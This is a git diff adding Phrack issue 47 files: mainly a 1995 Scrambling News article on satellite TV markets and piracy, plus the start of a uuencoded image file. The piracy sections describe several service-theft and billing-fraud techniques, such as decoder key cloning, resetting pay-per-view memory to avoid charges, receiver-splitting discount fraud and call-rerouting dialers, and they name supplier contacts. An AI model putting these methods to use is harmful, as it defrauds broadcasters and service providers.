+fees it is possible to receive services like internet feeds or
+real time stock market quotes.
+
+The entertainment programming available by C-band is essentially
+the same as that available by DBS but it is considerably
+cheaper. A VideoCipher II PLUS decoder and a subscription
+is required . There are some regional network affiliates from
+places like Denver, Chicago, Raleigh, LA, Dallas, Boston, and
+NY which are not available on DBS. This year the Digicipher II
+decoder will be introduced. It will be able to decode both
+analog and digital signals. This does not mean that the analog
+Videocipher II PLUS decoder will become obsolete. There are now
+over 2 million subscribed VC II PLUS units and that is not a
+market which any programmer would abandon. Current BUD (big
+ugly dish) owners and those considering buying one should know
+that space is scarce on C-band satellites. Hughes Communications
+has just sold the last of its capacity on two of its
+satellites, one of which has not been launched yet and there
+are several satellites scheduled for retirement in 1995.
+The shortage is even filling up Ku band transponders. This is
+happening at a time when there are literally hundreds of
+programming channels ready to launch.
+
+Transponder space on Galaxy 7 currently costs $180,000 per
+month. and because of the  shortage, transponders which
+would ordinarily cost $50,000 are going for $150,000. The
+solution for cable programmers is digital compression. At
+4:1 compression it is only necessary to rent 1/4 of a trans
+ponder and it is a new technology so compression ratios will
+improve even more over time. This will allow even more channels
+to be carried per satellite transponder.
+
+Many BUD owners who remember when a $150 Videocipher II was
+"the only decoder you'll ever need" and who have upgraded
+to a $399 Videocipher II PLUS within the past couple of
+years and who now face the prospect of upgrading again to
+a Digicipher II in order to receive digital programming
+are interested in any alternative they can find. One
+example of programming which is available in digital
+format but which is not offered to dish owners is the
+Encore Multiplex. In addition to Encore, there are six
+niche channels devoted to mysteries, westerns, love
+stories, action, true stories/dramas and youth programming.
+
+Several companies are betting that consumers will choose
+to add DBS receiving equipment to their existing systems
+rather than upgrade to Digicipher II. It is likely that
+the price of DBS equipment will decrease when Sony starts
+manufacturing systems this summer. It is hoped that programming
+prices which are now significantly higher than C-band may
+decrease slightly as well.
+
+Norsat is manufacturing a C-band/LNBF and so is Pro Brand
+International. They are also producing a C/Ku band/LNBF.
+These products will allow a BUD owner to continue to use
+his dish for all satellite delivered programming without
+having to replace his analog satellite receiver with a new
+digital/analog model. This will be the first time BUD owners
+will have had a choice in what decoding equipment they might
+purchase.
+
+Those now contemplating the purchase of a dish system can wait
+until Digicipher II is released this year, or they can consider
+a big dish with an analog receiver to receive the free programming,
+and a DBS system for subscription services. It is
+clear that an analog receiver with a Videocipher II decoder
+is, by itself, a dated product.
+
+Piracy
+
+While equipment manufacturer General Instrument claims
+that the Videocipher II data stream was shut off over a
+year ago, it is still being used for some services.
+These include regional sports networks including various
+feeds from Home Sports Entertainment, Sports Channel,
+ADC, Pacific Sports Network, and Sunshine, AMC, Nick E,
+Life E&W, WWOR, MTV, Discovery E&W, VH1, CMTV, ESPN E&W,
+CNN W, TBS W, WGN, CNBC W, TNT W, TNN W, USA E&W, CHN,
+A&E W, Youth (Canadian). These services are still being
+transmitted in VCII mode because not all cable companies
+have installed VCII PLUS decoders at their headends.
+The working keys for these channels change every few days
+and they are subject to an on-going ECM (electronic
+countermeasure) program so audio is not always available
+for all channels.
+
+There is software available on BBS's which allows users
+to receive audio and video on these channels. Authorized
+seed keys are necessary. The net effect is to  clone the
+VCII to the decoder which is really using those keys.
+EPROM chips loaded with working keys are available for
+about $50 and they work until GI extracts the keys from
+them and shuts them off. The most practical way to obtain
+audio and video for these services is by connecting a modem
+to the VCII decoder. Every few days the user can push a
+button on his remote control to download the latest keys.
+This method has been abandoned by most individual users,
+because the long distance charges, hardware upgrades, and
+aggravation is not worth the cost. There are some satellite
+dealers who still use the system for their customers.
+
+Many of those who still use their VCII boards, employ them
+to obtain video-only on PLUS encoded adult channels. There
+are several available, ranging from softcore to XXX. They
+include Adam & Eve, Cupid, Exxxtasy, LVTN, Network 1, Playboy,
+Spice 1, Spice 2, and TV Erotica , Video-only chips are
+available and EPROM files are available on many BBS's.
+
+Some individuals pirate the 10 TVN PPV movie services on T3
+on an 029 PLUS board by taking a "snapshot" of the RAM at
+the start of the month. They watch all the movies they want
+to during the month, and then at the end of the month they
+reload the data captured at the start of the month. When
+the unit is polled for PPV purchases it shows none so they
+are not billed. There is a period of approximately 10 days
+at the end of the cycle when no movies are watched. Many
+individuals misuse the Surewrit 9 test device for this
+purpose.  We have a file on the BBS called Plusmap.txt
+for those interested in studying further.
+
+Oak
+
+Oak encrypted services on Anik include the network feeds
+from Detroit, and sports, movie news, and Canadian channels
+which offer mostly U.S. programming. Discovery is now Oak
+encrypted as well. The Oak board is available in a VCII
+cardcage and some sources are selling these for $299. What
+they are selling is stock boards which must be subscribed.
+In order to clone the board to a working ID, the micro-
+processor must be changed to a Mostek. Oak is not subject
+to the ECM's which affect the VCII datastream.
+
+B-MAC
+
+There is a relatively new B-MAC product. It is a keypad
+which allows users to manually enter working keys instead
+of using a modem system to download them. Unlike the
+system being sold in Canada, this system does not encrypt
+the basic working keys which are for the Hi-Net service.
+Individuals may obtain keys from any source, instead of
+having to rely on one supplier. Keys for special PPV events
+are encrypted. The complete U.S. system including decoder,
+software and keypad sells for approximately $1600.
+
+DSS
+
+According to RCA, the receiver must be connected to a phone
+line. Where the deluxe system is installed, they say each
+receiver must be connected to  the same phone line via the
+1200 baud modem. (The unit also has a 19,200 modem). The
+phone line is not used to transmit authorization data to keep
+the receiver running. The receiver calls out monthly to report
+what pay-per-view movies have been ordered. It is also used
+to verify the location where the system is installed.
+
+Some individuals install the units at remote cottages or RV's
+where there is no phone. In this case, DirecTV has a backup
+system so individuals without phones may order PPV events
+manually by calling their 800 number. There is a $2 charge
+in addition to the cost of the movie for this service.
+
+As long as the unit is not connected to a phone line, the
+system operators have no idea where it is, so it could be
+in Canada, Mexico or the Caribbean. Some U.S. individuals who
+wish to obtain local blacked out sporting events use a billing
+address different from where the unit is installed, for this
+purpose. It is still necessary to purchase the NFL, NHL, NBA,
+etc. package and the unit must be connected to a phone line.
+Mail drops usually advertise under Mail Boxes or Telephone
+Answering Services.
+
+Those who purchase a deluxe system including a second receiver,
+obtain a programming discount for the second receiver. The primary
+receiver pays full price and DirecTV charges $1.95 extra and
+USSB charges $1 per month for programming received on the
+second receiver. The second receiver receives whatever programming
+is subscribed to on the primary receiver.
+
+Some dealers split systems. They place the primary receiver in a
+friendly location. The secondary receiver is typically sold to a
+Canadian. The dealer charges the full price for programming but
+only has to pay $1.95 plus $1. This can amount to a profit of $60 per
+month, every month per customer and is more profitable than VCII
+piracy was for many of them. We have heard that some installers
+have been requested to connect both receivers to the single
+phone line during authorization and that they have done that
+before splitting them up. We have also heard that some
+individuals have told DirecTV during the authorization process
+that the primary receiver would be located at their residence
+and the secondary would be located at a remote cottage and
+they have received the discount but they are not able to order
+PPV on the secondary receiver. Some individuals are selling a
+unit which intercepts the 800 number the receiver is programmed
+to dial and routes the call to a U.S. number where the 800
+number call is then placed. These units will be necessary this
+fall when the football season begins, at least for those who
+don't have a pirate smartcard.
+
+The dialers being sold now cost $125 and Canadian consumers
+who purchase them are unaware that hundreds of their
+calls are being routed through the same US phone number.
+It is only a matter of time before this system is shut down. Advanced
+Technologies will soon market a system which allows the user to
+set up his own network. Another company is developing a system
+which allows the user to manually enter the phone number being
+used. The only other problems we have heard regarding this type
+of gray market piracy is when foreigners have ordered PPV events
+while having the receiver connected to a phone line. In some cases
+they have received mail messages to their dishes requesting that
+they contact DirecTV to verify that their systems are in the U.S. Then
+they have been told that if DirecTV receives calls from a foreign
+area code their programming will be discontinued. Some do not
+order PPV events for this reason and others order manually.
+
+The major news which occurred just before we went to press is
+that the RCA system has just been hacked. According to reliable
+sources a nearly six month effort on the part of a U.S.-European
+coalition has lead to the compromise of the system. Current
+plans involve the issue of 4 tiers of pirate cards. The Blue
+card will offer only basic programming and will cost approximately
+$150. The next level card will include the subscription
+movie channels, the next level card will also include the sports
+channels together with packages like the NFL etc. The Gold
+card will be a global access card which will allow access to
+all services and will include a limit of $500 in PPV program
+ming. Note that the pirates are now limiting the amount of
+PPV events their customers will receive. To prevent the
+pirate card from being pirated it will employ a kill routine
+so that once it is inserted into the card slot in the receiver
+it may not be removed without dumping the memory.
+
+It will be necessary for those who engage in this type of
+piracy to mail in their existing cards or otherwise supply
+their unit ID in order to provide necessary information. Each
+pirate card will be unique to a specific receiver. Programming
+will be done in Canada where it will ostensibly not be
+illegal, at least for now. Three Canadian companies will
+essentially have franchises and will receive the necessary
+hardware/software.
+
+Release of the cards is expected around April, depending on
+two factors. The developers want to wait for the release of
+the series 10 Videocrypt cards in Europe. At this time the 09
+series pirate cards are being heavily ECM'd and a new release
+is imminent. One company supplies the encryption algorithms
+for both U.S. and European cards. The U.S. card is based on the
+09 series card in Europe. U.S. developers don't want their card
+reversed and counter ECM'd in the 10 series so they choose to
+wait. They also want an installed base of about 800,000 systems
+to make it more costly for system operators to issue a new
+series of cards. They have said in interviews that it costs them
+up to $35/card if they have to issue a new series because of a
+breach of security.
+
+In the past, we have sometimes been able to alert our readers
+several months in advance to events which would transpire.
+When we have done that, some entrepreneurs would immediately
+offer products which did in fact not yet exist. This is March 11, 1995
+and there is no pirate card for the RCA system available anywhere
+at this time nor will there be in the very near future. We will be
+allowed to see the system somewhere offshore and we will report
+our findings. Do not send money to anyone. We will have more DBS
+news next time together with more discussion of the issues
+involved. Do not send money to anyone.
+
+Resources
+
+Satellite dish dealers are experts in the reception of satellite
+delivered programming. hey are skilled in installation, maintenance
+and repair. Many now carry both DirecTV and Primestar.
+They are able to discuss the relative merits of each system. A
+bonus is that many satellite dealerships are "mom and pop"
+type businesses so potential customers are often able to
+deal directly with a proprietor who possesses knowledge
+and experience. Their biases: Some dealers have not been
+able to obtain dealerships for DirecTV and others refuse to
+carry it because they see it as a threat to their businesses.
+A dealer makes about 1/3 profit or $1000 on the sale of a $3000
+full view (C-band) system. The profit on a $699 DirecTV system
+is about $120 plus a possible installation charge.
+Primestar is a little more lucrative for the dealer than DirecTV.
+Primestar dealers profit from the sale or lease of the
+systems, from installation (which is mandatory) and they also
+earn commissions from programming ordered by their customers.
+Commission Salesmen working at consumer electronics stores are
+useless as sources of information.
+
+Miniature Satellite Dishes is a Frank Baylin book which
+discusses the DirecTV and Primestar systems. There is
+information on the basics of satellite communications,
+the receive site, a comparison of DBS systems, signal
+security, programming, installation instructions, and connecting
+components to the system. There is some theory.
+The book is a good primer. It is easy to read and it is well
+worth the cost for those who want to know more. Baylin
+Publications. 303.449.4551.
+
+Orbit is a C/Ku-band programming guide. It includes both
+free and subscription programming, audio services and
+backhaul feeds. You can see what is available on a C-band
+system. The ads for various programmers allow comparison
+of the cost and availability of programming with DBS. C-band
+programming is substantially cheaper. VCRS decoders are
+available at a discount when purchased with programming.
+Competing publications include Satellite TV and OnSat. These
+are available at most magazine stores.
+
+Satellite Direct is a monthly programming guide. It divides
+each 8 hours worth of programming into two facing pages.
+It is cleanly laid out and easy to follow. It is available at most
+magazine stores.
+
+Consumer Hot Lines. DirecTV's answer line for those who have
+questions about programming or equipment is 800.264.4DTV.
+USSB's number is 800.633.2820. Those with questions about
+Primestar equipment or programming may call 800.932.2007.
+
+Bomarc Services is producing a set of schematics for the RCA
+receiver. They are contract reverse engineers and they have
+thousands of  schematics available for all kinds of electronic
+devices including most cable boxes. A catalog costs 4 stamps.
+Bomarc Services, Box 1113, Casper, WY, 82602. No phone.
+
+S&J Electronics is one of the few companies left which still
+carries VCII test devices. They have video only chips for
+those who want to view PLUS video-only on a VCII. They
+also have chips which allow VCII users to receive audio/video
+on the 28 services which still  employ the VCII data stream.
+They are also a supplier of B-MAC's and the keypad
+system. 201.728.3217.
+
+Triangle Products is the major supplier of Oak decoders.
+They are available in VCII card cages for those who don't
+wish to use free-standing units. They also carry SureWrit 9,
+which is a diagnostic test device for those studying VCII or
+029 PLUS technology. They have raw B-MAC's as well.
+616.399.6390.
+
+Travel Sat is advertised as a satellite in a suitcase. Included
+is a complete RCA DSS satellite system, a 16 inch fibreglass
+dish, hardware components made of stainless steel (to prevent
+corrosion) and a signal strength meter so a television receiver is
+not required to set up the system. They also manufacture a roof
+mount for RV's. 800.270.1692.
+
+Eagle Aspen DBS To-Go consists of a plastic case containing a
+14 inch dish, a DBS compatible LNBF, hardware kit, compass,
+and cables. Options include a power inverter. It is suited for
+those who want to mount a permanent dish at the cottage and
+simply move the receiver back and forth, or for those who want
+a portable satellite system. 404.423.7072.
+
+TCC BBS is an originating source of satellite TV piracy
+information, test files and working keys for the VCII. The
+sysops are active in answering questions. They are also
+knowledgeable in other areas of hacking, electronics and
+computers. BBS 809.394.9001.
+
+New Advanced Technologies is another B-MAC supplier, they
+have test chips for the VCII and they will soon market a DBS
+dialer which will permit the user to set up his own network.
+514.458.3063.
+
+(C) Scrambling News 1995. 716.874.2088. snews@buffnet.net
diff --git a/phrack47/17.txt b/phrack47/17.txt
new file mode 100644
index 0000000..53d457c
--- /dev/null
+++ b/phrack47/17.txt
@@ -0,0 +1,619 @@
+                              ==Phrack Magazine==
+
+                 Volume Six, Issue Forty-Seven, File 17 of 22
+
+begin 644 NORAD.JPG
+M_]C_X``02D9)1@`!``$`:@!J``#__@`752U,96%D(%-Y<W1E;7,L($EN8RX`X
+M_]L`A``+"`@*"`<+"@D*#0P+#A$=$Q$0$!$D&1L5'2HE+2PJ)2DH+S5$.2\R#
+M0#,H*3M0.T!&2$Q,3"TX4UE22EA$2DQ)`0P-#1$/$2(3$R)),"DP24E)24E)!
+M24E)24E)24E)24E)24E)24E)24E)24E)24E)24E)24E)24E)24E)24E)24G_D
+MQ`&B```!!0$!`0$!`0```````````0(#!`4&!P@)"@L!``,!`0$!`0$!`0$`_
+M```````!`@,$!08'"`D*"Q```@$#`P($`P4%!`0```%]`0(#``01!1(A,4$&D
+M$U%A!R)Q%#*!D:$((T*QP152T?`D,V)R@@D*%A<8&1HE)B<H*2HT-38W.#DZM
+M0T1%1D=(24I35%565UA96F-D969G:&EJ<W1U=G=X>7J#A(6&AXB)BI*3E)66)
+MEYB9FJ*CI*6FIZBIJK*SM+6VM[BYNL+#Q,7&Q\C)RM+3U-76U]C9VN'BX^3E\
+MYN?HZ>KQ\O/T]?;W^/GZ$0`"`0($!`,$!P4$!``!`G<``0(#$00%(3$&$D%1D
+M!V%Q$R(R@0@40I&AL<$)(S-2\!5B<M$*%B0TX27Q%Q@9&B8G*"DJ-38W.#DZF
+M0T1%1D=(24I35%565UA96F-D969G:&EJ<W1U=G=X>7J"@X2%AH>(B8J2DY255
+MEI>8F9JBHZ2EIJ>HJ:JRL[2UMK>XN;K"P\3%QL?(R<K2T]35UM?8V=KBX^3E&
+MYN?HZ>KR\_3U]O?X^?K_P``1"`&A`H`#`2$``A$!`Q$!_]H`#`,!``(1`Q$`Y
+M/P#T'%*![5N9"XHQ0`8HQ0`N*7Z4`)]W&>,TM``*2@!5^E+BF(3TIU`!CBB@P
+M!<4N.:0PQ1B@0H%*%XR>!2``<'@?C7*>%M0N+G7O$5I+(3!:W6(4(^X"6SCZP
+MXS2ZE=#J>U+BF2)BBF``4NSG/3ZT``"COGZ4A)'3CZ4`)GFDQQ0(3M2=A3`,>
+M<\4NSCG`H`#M';/UI,GMQ]*`$VD]!1L`ZD#Z4"&$C^[Q[TF2>],!I%-(Z4"$=
+M-(>O2F`TBDVT`(1ZTTCFF(0C\*0B@!A%)M.:8AK#%-VTP&L.*:1Z4"&D=:;BV
+M@!I'!%-VTP&$4PK3$-V_E32*8#&&*:10(81^-,(YI@(!AJ6@!A%,/ZU0AA&/$
+M:FXH`]%QQ3@*XSJ#%&,4`&/6@#%`"T9`&:`%`YS^5':@!,<]**``4M`!_C2C>
+MK0`8XHQS3$.(H'6D,`*<%.,]!2`7@=/S-)WYH`3!KAO!SD^-?%B?]/`//^\U"
+M+J/HSNL<44Q`$)YQ2[0#R<_2@+"`\?+Q2'KG.?>@!,<<48IB#%-QSQ0`OEG'V
+M)Q28`'0F@!,MG@@"@*?2C8!"%!&6Y["C@=!^=`"$YZFFFF(0CGFFD4Q!BFD4Z
+M`(1Q2$#-`"&DQ[8IB$Q@4PX%`!CTII'%,0A'/%-V]A0`UACK3<?A3$(132N*@
+M8#,<TA%`AI''%-V\^E,!A6F$4Q#2#VIK+Q0`QAQ3,`C-,!"M1D<TQ#0O-*5P?
+M*`&8J/;SS3`81^=)BF(]$[4HKC.H7%%(`HH`,4N*`%`I,4`(11CFF`H'%)CT:
+MH`7Z"E_2@``XI<4`*1P:<%]>!2`.!]WCZTG)ZYS0`#I2@<T`%<#X/60_$#Q/5
+MA&\OS&RV.,[SWJ7N-;'H&U<<G\J,CL/SIB&L2>II/I3`44$4``'H*4IZG%`61
+M#"]LFFDGMQ]*`$VDC.*,`#D_E3$)D#H*0Y/K0`TBDQS0("*2F`F*;CF@`(]*C
+M;WH$)CI2$4P$/I1ZT"&XIN.^*8!CTI"*!#"N/6DQUI@-(I-M,0UA33P10`A7_
+MK3-O'>F`FW`Z4S;S0(85[<BFD<]!3`932O'`IB&,./2FD=<4P&D4PB@0S'S4N
+MI&*8#"*C(YI@,84TCM3`]#I17$=0M%`!0.U`!@4N*``#TH(Q0`4G?I0(444`0
+M%`ZT`+FG;3W.*!CMV.@_&D[\GF@`]<4`4A`[K&C22,%1!EF/``]:9:7-O>VZ'
+M7%O,DL3\JR'-`[$N5'W5'XUP6@7,TGQ1UZ.>9I%6,A`6X4;EX`_&IZH=]&=X9
+M.E!JB0I0"3P*`%V>I`]J.!T&?K0&P@8X]/I2,,#D&F`#KR.*,_-A0!0`G/4G_
+M-)CB@0F*,4`)C%-YW<@8_6F`8HQ0(C*MG[V!Z`48H`0BFXI@(11@T"$(Q1BF1
+M`F*0B@0A6FE3FF`A&!3=O'2@!I%)BF(1A^%-P,^E,0PCDTF/I0`W932N*8AA8
+M&.E,(I@,(II'%,0U@?;%,8<4(!N.PIC#GBF(:`0:",4P&$5&13`81CO3""",&
+MCBF!Z%VI17$=044`!H':@`I1[XH`6@\T@$%'>F`@HH`,=JQ]8\26>D$QR2#S"
+M^RXS^@_KB@#`@^(PWR&;3\1`_(8Y,MCWS73Z7K=EJP8V=P)&5060G#+GVJG&F
+MPKFIZYI1UJ1B@>E*`%/)S4@1W2O-:31QA2S(0%8X!R.Y'-<A8:SJ/ANU2VU?[
+M09([=/\`EO9_O5^I'-"'?0W],\1Z3K`'V*^AD8_P%MK?D:X_0'8_%W700!^Z8
+M8?ELHZA:R/10I(Z&E*X'49]*+B&@$>G':G$DG`_*F`FS((;&/2EX';-``#Z#S
+M%(?I0(3%-Z&@!V.*3%,!*7%`"$4@%`A"*,>E`#=M4+J_CLYE$APK'%14GR*[8
+M+C&[L):ZI:WI<1.-R$!E/;/(J#4-8@TRYCCN'50_0DTIU.1)L(PN[$MEJ5MJK
+M4`FMI%92<=:M"M$[HAJS#`H(Y-42&*3%`#<?E01Q3$,(I,<4P$*\TW%,0C+@T
+M4W%`#=O)IN.,4"&D>E-QSP*8#".::5XIB(ROI32*8AI`QR*81Q3`:13",'WIN
+M@-"X(HV\4Q#&'%1D<\4P(V&:810!V-OK>FW40DAOH'4G`^<#]*<=;TQ51C?P;
+M;6.`=XY-<G*SIYD11^)-(E)"7\!Z#[V.O_ZJ?;:]I=X0+>_@=B,@;\']:.1AW
+M=%Y)$E7,;JZ],J<TX5(Q:J76JV-BNZYNHXQNV\MW]*:5]@O8H-XNT96@5;Q6+
+M\YMH*]%]V]!523QUH)9XGED*YVDF(E2/\*KD8KHTK+Q'I5\@>&]C^9]@#':24
+M?H?I5]KB%&"M*@8G`&[DFDXM!=',:WXXBTK4/L4%H;EB@(=6_B/0`8YKGY_%%
+M6L62E;^]2%V.3&D8:0#T'8?B::5AF/>>)]199EMKF:))``[ERSL.W/;\,5B[C
+MI)6"EVYY^:KL2V(3+%F(@<>E36FHW%K<QSV\ACF0Y5AVIB.C\.^,-6L[5XQ&S
+M+J%&/[R9B`F>VXG]*]`T;Q-I^JNMO'.GVT+EXAG`(ZX)'(K.2N]"EHM3:W$^\
+MWM0*@8HI12`YK6O"VE7E\;F^M5\NXPK3(=CQOT4Y'4'I[''J:XC3;'4M-^(E#
+M]9Z)/#)/"C8>\R=Z84[20.O3GVJ>MB^AT<>M7FCZS/J'B'3+VV\R-8S);MYD>
+M'U(SQ^O4^M=%%XGTR[T^6YL+E+ID3<(4;#MCM@TUHA-7-.SN1=6<4Y@DA,B[#
+MO+E`#+]<5-D^O%,0@'%&*8A.]+B@!*,4"%`-)CI0`F*7%`"8P:`.:`$(]*"*"
+M`(C*@)RP&/6N<\8O#!IPF,JK+NP@()!/;I7/7:<&C6FGS'+MJ\.A:BLTDF>%9
+M1L#'/3)'YURVK:ZVH(7GQ)-O(WC^[G(/UX_6N>$I5(IEM*+-?X<6EY=ZC)=A>
+MF%E;DYR>K'_ZU>IB5#T89QD5Z,4['/+<?_*EIDA1BF`F.:0K0(81^5)MIB$(8
+MQUIN*8`13<4"&[>O--(P*8#""%)"Y]!2!30(85XIA'K5"&[>:85H`:1@8'2FK
+M$?A5"&E::5H`9MP:"M,0PKQ416F!&R_G3"O/]:8'F@8@<'%2JV(]W4^_:LC<1
+M'SNR#D4K$``8_'-`%K3=5N])N!/9W#1N.,9X(]Q6M)XZUYU4+>;<'J$'-#BGS
+MN%RK=>*=7O8PMQ>2LH_NG;WSVK.$^2"Y9B??FE:VP7'1QR28PQ`Q\V>U-;RD.
+M4AG+&@!\$0FE$<7SLWW47DFMNRLXH][7$VTHI811ON<G'KT'ZGVJ92*BKE*_!
+MU&89\@"%2@7>IRV/3<>?P&!38T6Z<"4G#C*DCI]:-E<-RS;Z.UQ83LI(*.%R8
+M1GMT]L?RJ.YTZ#[/&;68RW`8@PCD*,]<]_2N=8A<UB_9Z7(/[)OU4RL%CC(PW
+M7E.T?KU_"H3+8V_$2?:9/^>C@JGX+U/X_E71>^Q%K;D,\]S>X9V+!.%50`J>H
+MP`X%.1KN*1)X7=98^CH<$&GHA;G::)\1;J!U@UB$S*H`\V(?-]2.]=SH&MPZ!
+M[IZW,/#`[73^Z:B22V&C6`P>3BE#`=!^-9E;#)(EN(GBE421N"K`]"*\QTR6S
+M/2_BM??:9WE^1HU.-S.<#:..IP*E[H:V9Z+'!+=,)KU=JJ=T<'4)Z%CW;]!^)
+MM4]2\):-JA=Y[)(Y6ZRP_NVSZDCK^-,5[/0TK*S6QLXK9)))%B7:&D;<Q^IJ]
+MQBF(0"E-`""C`H``*,<T`*.U)B@!,4N*`#%(!0`8J*9S%&6`)P,U,G9-C2NSN
+MEM8OVTY))+J5<NI*<<(#GC^5<;K.O27MFHA9)0QP#CTS^?/^>:\I7G+78ZGH!
+MC!U#2[_49KJ=FC2&)?,9B>H]1_GN/PYR4_-@-D5V46K670RDK/4[GPCXCL]*>
+M\/7UM(HB;:7#Y^:5NG'TJGIWC.Y\V.*9RD9"QNZGDJ/3WKM4TC!Q/6--U*TO'
+MK=6M95=0!WSBKX[TV2&.M'M0`8Q28I@-(I-IH$(5_2FXZ8IB#;]12$4`-VBFX
+M%>*8A"!3<4Q#2*C9>E-`-V^E,93CIBF(:R\4TK3`:1497%,0W'-&*8$;+Q435
+M+SZ4Q$;CWQ3"*8'E^,"G!L#':LC<7+$;L'&.PI,],F@!0>,Y_"C=S0`^/!)RV
+M3@=A4H>-,;1DGU[4@)8K>:X++#F0]U7^9]*D%I;VC(]W/Y^3_JH#D?\``FZ#"
+M\,_A2OT0[#9[QRLBVX6"W+89(QC=]3U/XTEA<M;RAX/O9X!HMH%S2L-(EU*X+
+MAA+",.=H+G@?A5^.VL-+D_TL-*B-@D'CZX':N3$5^7W8FL(7U87VOZ<4(M)5:
+M:*/#;!GY\=<Y_G7.P:A;HMP8"L4FX/&Q.TCJ<#]*Y(0DKFLI($U>ZU&]\VZDE
+M+D=<42VW[Y648C;G%>C2LHV.>6K+$RX01Q84`8!'>BWM[AI@($,BJNZ0YP%],
+M\G@5>VXB9H;)8_W\YFE'(BA/8^KGC\LU)8^)+_1YC)IXA@3C?&JYW#_:8\FAX
+M:[@]#O\`3_'MO.L37MJ]G$^XF25P``!P0.K9YZ5T-EKVF7R!K6\BDST&<'\JV
+MAQ?0=[;FANSUKS72\#XRW^#_``MT_P!P5'4KH>F#I2TR1:!0,7MQ2'K0`F*7\
+MI0(3\*.@R>@H`4=C10`"@#GK0`AHH`2LO77D6SQ"VR3/RMZ5C7=J;L7#XCS.^
+M\N?M'VHZAEN3&GS$8Q[=ZY:62.&(1VS9\MVS(XVD\\8_"N*DON-9E62Z<2*\<
+M<A(R#M[8%2"U%SFXN8_LZ_=PBD#/^-=:]V)ENRA=[FEX8.H``*CC`'I2V%I-]
+MJ%Y#9VREI97"@5I'4'H;FG:E=:)?_8V=A##.'D9&Y<#G]>*]3T/QAI^M)(4;@
+MR71L%7/;UK9.^AD^YT(-%,!0,4A^E`A,48XI@(13=O2@0A%!`S3$,(II'':F5
+M`A%-Q3$,(IF*!#<8II'K5"&,,4UEI@-*YIA7VH$,V\T;1W%,!A%0D8/2F(C9'
+M:813`\MYS6E:PVT%K)-*X:8IF.(CAO6N6M-QCH=,5=D4WB>\BDD6U$<0D&W&.
+MT':#VJO;26D\3O<S^3(.B@9W$]_I6%-N&NYI)7(W0HY4,&]QTH`)'H*[$[JY(
+MCL3V]M<3(YB0^6.&<_*J_4G@592*SMMBL?M<K<D*=J+^/4_ACZFEY#&W=U,8A
+MV@1@MMG(CC&U<^_J?<U!"XVMO.4],4T)D38/W"0.X-:5G;M%Y2Q*7FDZA1D\=
+M]A0P.FL[62V@>>YE\F:)2T2@@D''&1[5FZVKFR2XBB#F7L?N\YR?;.,UX]1I&
+MU7;8ZXI\IQ<T$D#R%BJLG##<#UJL"?6NM.Z,S4T^5F01((D"$N7/!/`[^V.EL
+M="MG.8(Y)VCMX%Y220X!_#J?P%:0=G8EHB\ZR@E81H;J3IO<[$S[+U/XG\*:&
+M]Q?7Q>%BTNS[D$:?*OT4<?C6JU>I/H-AL8#*OVV=(F(QY47SO^G`_$_A1/.;2
+M$J]E;K%GI*W[QQ^)X'X`4]Q;&9)-)/*9IY'D=C\SL22?J33UF=<A?DR.W'6K&
+M$:\.MZO`JW,>I7)D7DY?<,'CH?I56749[7Q,U]%/)]I:..1I%X)8HI/\ZRGNI
+MAQV9ZAIGQ"TBYMH/M,C07#G:Z%"<'USZ5UJL&4%2"",@BI:L-,=Q2]Z0PHH`1
+M0=*6@!:0@'@\Y[4`+24@$'`QS3N*`&XQ2%@O5@*`*UW=+:PF1`KGKM4\FN4\_
+M1:Y;WT/E6DVV2-AO.0`/K^1KEK5$_=1K&-M3@M6U`7T_[EFDVJ,E.>@Y./PKS
+MF95#RR`.7RQ"$+@L?7%$$EL)MO<O^'=!GU74%$@V6T,H6;)P<_W?49Q6WXQN(
+MHXK1+$0)%*-LC[!QD@<#_/05,Y*4TET&DTKG$[R`:U-!U&ZTNY:[LBB3*N%=B
+MU!'7ISZUU1T9F]BOJ>I&_P!1FNUC$)FY=1R`3UQ[5=T)Y+&5-4<?Z'#,H8'^)
+M-NH'X=?PJHZNXGHCU'0?&$>LZF\$97RU08;.-S'K@=>X_6NKR,#`Z^E:.W0@9
+M=WH-`A#1B@`(I,#BF(0BDQ3`;WIA7B@0T]*3'-,0S'I3"*8AI'-(:8#&''%,'
+M;I3$--,84Q#-O-*1TI@,(&.:A8<TP(V%,(&:8CRN%E#C?DCVJ>[BNYBLD$1`.
+M4D;%7M_45PUWJD]CKB8LB,&;*D$]J9SWJ$4;%C()\QLD2JB8\UVQMYZ^IJWN!
+MM(/EA1KJ0?QR#;&/HO4_C^5=$&VC-V1!<W4UR%,TC,%/RJ.%0>@`X'X5$.6SD
+MG'?FM-A"HX!/.1UP:L16LMTY6S1W/<*.!]?2B]A%];"WMK>&6^>23=]V.$?*N
+M3Z%SP/PS6S;17EPZQ6T:V<#L%;9P2/\`:;J1^E8SJ12O+8N,7LMRSJGAVX@$N
+MK+<"5`-V4./?!]ZYW4X=3:#R!&?LT+;^#QSTQ^7ZUYG-!3.BSL)I_A::[>(7W
+M%X([:5\LN[D<<GZUSVHZ>UC<F-2S+ZE<;3_=/N.,UM3JJ4K(EQLAEJL7F(L^+
+M5RWWB.![UK'4;8*T:J75MWS,<,.?E_2MKM/0S,R2X&[*DYK62^N[RS6VB8A,$
+M89(_EW_[V/O?C6D'K=B>FQ"5*L)(/E*]1WJ5+QL%902*Z+$%9P%8JIRN>*17M
+M*CU`H$6/M"QP83@GI45V_FZB7Z'R(\_]\+6<]T4MF21RJ)(BPQC[Q[&O7/`N_
+MOQZCI_V*2?=<VXP`1C*#@8]:<EH".NHSS61049YI@*.E%`"9YI1[T@%'04>EJ
+M`"4N:`$/XURFM>*8;*X^QRJPF^Z3M]QT_2N;$2DH^Z:4TKZG"-J<HU)H;B^#^
+MQ(VR0@XVD9X_#\JLW5]ID>M*L:[XF.R57Y#,,$?AS^E<DXMR]WL:)Z:D>I66Q
+MFV^G:E]CMX8+Q1TZ?*><`#O@8KC;.T5M4A22-A&S*3M?.P9&3G'_`.JMJ$WR4
+MMR9,UKH=_8W'A_08W^SD^?*_FOO;/J5QGN,G\:XCQ+?M>W8EWAPO&1]!UJ::(
+M;J<S')JUC#4]ZU%TRX?1&O0J"(R`!B0"?85W)&+=C-CC:658T').,5V7B:>#&
+M2]`L='M8U"[1+*PP27/<_A51^%L4MTC$\/:BFGZE',SLL2C]X%ZM[>V:]MT3"
+M4O[3L_."D*3\IQ@$>U5%^Z3):FH.M#`XX.*8A,&EQ3$(10!TH`1A28]:8AN*8
+M81\O-,0AIN.:8AA%-;I3`:1S36&*!#&'I32/K5"&FF$>E`#,<_TH/2F(8PP*7
+MA/6F!&U,-,#AK>PT>)66ZNLR9`!#`)5'6]0DL;F-+2)K:%H@`-^X.N>H/O7EQ
